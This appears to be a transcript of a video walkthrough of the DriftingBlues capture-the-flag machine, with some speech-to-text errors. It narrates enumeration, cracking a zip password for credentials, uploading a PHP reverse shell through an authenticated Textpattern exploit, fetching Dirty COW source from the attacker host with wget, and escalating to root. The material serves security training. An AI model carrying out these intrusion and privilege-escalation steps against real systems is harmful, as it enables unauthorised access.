Hi everyone, welcome again. Today we're going to look at another CTF, drifting blues. So yes, let's start again with the um, host discovery stage. Try to identify the IP address, try to identify the target machine. This is the IP address, so straight away we jump on to the port scan, try to identify the open ports. And as with the previous videos, this is my preferred port scan techniques. Good. So it seems that's the only thing we have is port 80. That makes our life much easier. And we already have in the initial discovery that there is an allowed directory in the web server. Okay, let's straight away move on to the derp and try to see if derp can give a derp. At the same time, go buster and see if GoBuster will have something new. And for completion, let me also do their buster, their buster, their buster. Okay, so I have the robots, I have spammer. I don't know if Derb discovered spammer here. That will be interesting. So we have the robot.txt. Let's open it here. It shows that this is not an allowed directory. Obviously, we straight away go ahead and try to open it. And that gave me a login page text.pattern, which seems to be that CRM. So quickly we go and search for a vulnerability for this one. Text. What's wrong with me today? Text. What's a pattern? Text pattern. Okay. There is an exploit for it. This exploit is authenticated. That means we need a set of credentials. Okay. So now we know that we need credentials. Now let's go back to our scan spammer here. I don't know if this one discovered spammer. It doesn't seem so. So let me go ahead here and try to access spammer. So duplicate and spammer. Oh, spammer seems to be a zipped file. That is interesting. So what I would do, I would go here and from download spammer to here. And instead of copying, let me move it. So now I have it here. Good. So now let me try to unzip it. And it seems that I will need a password. Okay, I will need a password. So let's try to fcrack it. So let's try to fcrack it. And I have the password now. So if I go ahead and try to unzip it, then I'll just type the password my space 4. Seems like there is a typo. My space 4. That is interesting. Let me copy and paste it. Voila. Again, it's not my day today, so probably I shouldn't type. Good. So we had a new file called creds. Let's see what is inside it. It seems that I have set of credentials, which is really useful because Now what I can do, I can use these credentials to run this exploit. Let's have a look at this exploit here. Go to the content section. So first of all, we should file upload a shell. Okay. Click files and upload the malicious file. Go to the your server text file and then run the code after uploading our file. That is interesting. That is interesting. So first of all, I need to log in. So I will use Mayor and Lionheart to log into the CMS. Mayor and Lionheart. Okay. Okay. Don't prompt me again, please. Don't save it. So the exploit after that says go to the content section. So now I'm here. This is the content section. And click files and upload malicious file. Click file and upload malicious file. Click files. And that's where we can upload the files. So the way that they explained it, it seems that they wanted us to upload a CMD file. What I would do to keep things simple for me is that I will upload a reverse shell file. I think from previous, oh, don't have it. So let's just find, let's copy it in here. Nano, the PHP reverse shell. Just try to change the IP address into my IP address. I will put a listener, then I will upload that one back to my system. Cool. So what I will do here is 192.168.0.18. I'm happy with this IP address. Let me on different tab now start a listener on that port. Good. What I need to do now is I will need to upload that file. So browse. It was demos. It is which machine we're doing? Driftingblues. It's this one. Cool. So I will upload it. Even before that, let me see in here. Did we have any uploads? That would be useful to have, probably the files. Now let's go back to the exploit and see if the exploit specify where we need to access it. Yes, your server, text pattern, files, and then the name of the exploit. Let's try it. So what I would do now, I will go ahead and upload the file. What does it say? Okay, it is uploaded. I will go here now into, let's just, so what was, sorry, come on. What was the file? Text pattern files. Interesting. So if I go, so that means this is the one, isn't it? Text pattern file. So if I open it, I see my shell. If I clicked on it, it is running. Most likely that means the exploitation was successful. And yes, we have it. Straight away, let me copy my TTY upgrade shell. So that will enable me now to have a proper shell on this machine. And that's it. ls-all. We have access. We do have access to this machine. Let's look at the sudo -l. No, sudo-l, sudo command not found. Okay, not a big thing. Let's have a look at the home and see what we found on the home. Oh, only one. Oh, that means I have really bad shell. ls home pwd cd home ls-all. Okay, nothing interesting. Nothing interesting whatsoever. Okay, ls-all. It's the password. Okay, cat. It's the password. No new users. Okay, doesn't seem that very promising. The only thing we need to check, I don't know if clear will work here. No, it does not. Let's check the uname dash A and LSB release dash A. Okay, uname worked, but the other one didn't. Fair enough. So we are looking at Debian 3.21 vulnerability. So let's go here, and from there, just to check if we have exploit. Yeah, dirty cow. Dirty cow tend to be very effective most of the time. And let's try it then. So how it's work? Is there anything special? GCC nothing. Okay, dash lcrypt. Fair enough. Fair enough. So let me get the shell. Copy it. And let me here. What do they call it? I'd like to stick with their naming conventions. Dirty.c. Okay. Dirty.c. Now Python cd temp wget http 192.168.0.18 and dirty.c. It isn't there. Let's see how they compiled it. That's how they did it. Just copy and paste it, save me time. Voila. ls, I have dirty. I think the next step is just run dirty. Okay, so here we can either run it with, we can run it then type su. Okay, so dirty and then su firefart. Okay, so that's fine. Probably they will prompt me for the password. So now if I type dirty, they'll ask me for a password. I will put test. Okay. And I'm waiting. Sometimes this vulnerability might crash the server and I might need to, unfortunately, reboot it again. Okay. So let me reboot it. If I say exit, Control C, that's fine. I will create another listener. Let me try to run it again. So if I go back in here, oh, you can see that's the HTTP server crashed. Okay, that's fine. Let me try to reboot the machine. And I don't want to restore it. I just want to reboot it. Hopefully that work. If not, then probably we need to think of another way. But definitely that vulnerability exists on the system. Okay, let me go to the files. I have the listener. I have the shell. Let me again upgrade my shell into a proper shell. Oh no, that's silly. It's not copy and pasting enough. Okay, so if I ls temp, unfortunately that crashed again. That's not really good. Okay, so what I might need to do again, let me see if cd temp, oh my god, cd temp, okay, copy. Let's just make sure that's the Python. Seems there's something wrong with my machine today. Python dash C import pty, then pty dot spawn, then bin bash. Hopefully now copying from here locally will make it better. Good. So now we have this. What I would do now, because we already have the dirty, so I will just get it again, wget http 192.168.0.18 dirty.c. Good ls. Unfortunately, I need to recompile it again. That was the compilation parameter, and hopefully this time does not crash my system. ls, we just need to run it. Dirty. Uh, let me just confirm. Yes, dirty. Okay. Enter a new password. We just put test, I think. And you can see there is that entry, fire fart, whatever. So, was there SSH? No, there was no SSH. Otherwise, we could have used SSH. So we will need that to finish. And hopefully once that finish or completes, we will be able to get this shell. I will pause the video for now, just to make sure that the shell is back. Then I will resume it. Good. In fact, it didn't take that long. And as you can see, we have the shell back. And su, again, let's just look at what the shell itself is asking us to do. Uh, then su fire fart, then su fire fart. They will ask for the password. Did I put test? I think I did put tests. Fabulous. And now I have a root access. Can look inside the root and see. Sorry, ls root. What? ls root. Good. Cat root flag.txt. And yes, we have it. So this is how to hack into drifting blues and how to perform privilege escalation. See you in another video. Bye.